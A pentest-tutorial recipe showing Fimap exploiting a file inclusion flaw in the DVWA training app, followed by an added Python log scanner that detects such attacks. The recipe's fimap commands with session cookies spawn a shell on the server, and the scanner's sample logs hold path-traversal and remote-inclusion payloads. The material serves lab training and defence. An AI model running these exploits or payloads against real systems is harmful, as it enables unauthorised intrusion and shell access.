In the very first recipe, the Burp Scanner also identified the file path traversal vulnerability. In this recipe, we will learn how to use Fimap to exploit the file path traversal vulnerability.
Fimap is a Python tool that can help in finding, preparing, auditing and finally exploiting local and remote file inclusion bugs in web applications automatically.
To step through this recipe, you will need the following:
For this recipe, you need to perform the following steps:
http://dvwa.hackhunt.com/dvwa and log in with the default credentials. Click on File Inclusion from the left-hand side menu, as shown in the following screenshot:
fimap, which will show the version and author information, as shown in the following screenshot:
fimap -u 'http://172.17.0.2/dvwa/vulnerabilities/fi/?page=include.php' --cookie="security=low; PHPSESSID=b2qfpad4jelu36n6d2o5p6snl7" --enable-blind
-x at the end in order to go ahead and exploit this file inclusion and get a shell on the server, as shown here:
fimap -u 'http://dvwa.hackhunt.com/dvwa/vulnerabilities/fi/?page=include.php' --cookie="PHPSESSID=376221ac6063449b0580c289399d89bc; security=low" -x
1 as our domain is dvwa.hackhunt.com, as shown here:
1, as shown in the following screenshot:
1 is to spawn a direct shell and the second is to create a reverse shell using the pentest monkey script. For our demonstration, we will use 1, as shown in the following screenshot:
In this recipe, we used Fimap to exploit local and remote file inclusion and get shell access on the server. We used the following switches:
-u: This indicates the target URL.
--cookie: Since our point of injection was after the authentication, we had to use this option in order to set cookies so that Fimap can access the injection point.
--enable-blind: This switch is very helpful when Fimap isn't able to detect something or if there are no error messages appearing. Note that this mode will cause lots of requests compared to the
-x: This is used to exploit the remote file inclusion vulnerability and spawn a shell automatically.
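The same traffic from the defender's side, as an added example that is not part of the original recipe: a small Python scanner that reads web-server access-log lines, normalises the page parameter of the file inclusion URL used above, and flags traversal, absolute-path, remote-URL and non-allowlisted values, along with clients that send a burst of requests to that page (the volume that --enable-blind produces). The log lines, the allowlist of page names and the burst threshold are constructed assumptions.

```python
import re
from collections import Counter
from urllib.parse import parse_qs, unquote

# Constructed access-log lines for illustration (not taken from the recipe).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /dvwa/vulnerabilities/fi/?page=include.php HTTP/1.1" 200 4312
10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /dvwa/vulnerabilities/fi/?page=..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 5120
10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /dvwa/vulnerabilities/fi/?page=%252e%252e%252fetc%252fpasswd HTTP/1.1" 200 4312
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /dvwa/vulnerabilities/fi/?page=http://203.0.113.7/x.txt HTTP/1.1" 200 100
10.0.0.7 - - [01/Jan/2024:10:05:00 +0000] "GET /dvwa/vulnerabilities/fi/?page=file1.php HTTP/1.1" 200 4400
"""
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')
ALLOWED_PAGES = {"include.php", "file1.php", "file2.php", "file3.php"}  # assumed allowlist

def classify(page):
    """Return why a 'page' value is suspicious, or None if it is allowlisted."""
    for _ in range(3):               # decode repeatedly to undo double encoding
        page = unquote(page)
    p = page.replace("\\", "/").lower()
    if re.match(r"[a-z][a-z0-9+.-]*:", p):
        return "url-or-wrapper"      # remote URL or stream wrapper
    if "../" in p or p.endswith("/.."):
        return "traversal"
    if p.startswith("/"):
        return "absolute-path"
    return None if p in ALLOWED_PAGES else "not-allowlisted"

def scan(log_text, burst_threshold=3):
    """Return (findings, noisy_clients) for requests to the file inclusion page."""
    findings, per_client = [], Counter()
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue
        client, target = m.groups()
        path, _, query = target.partition("?")
        if not path.rstrip("/").endswith("/vulnerabilities/fi"):
            continue
        per_client[client] += 1
        for page in parse_qs(query, keep_blank_values=True).get("page", []):
            if (reason := classify(page)):
                findings.append((client, reason))
    return findings, sorted(c for c, n in per_client.items() if n >= burst_threshold)

if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```

The classify() check is the same allowlist comparison the application itself should apply to the page parameter before including a file.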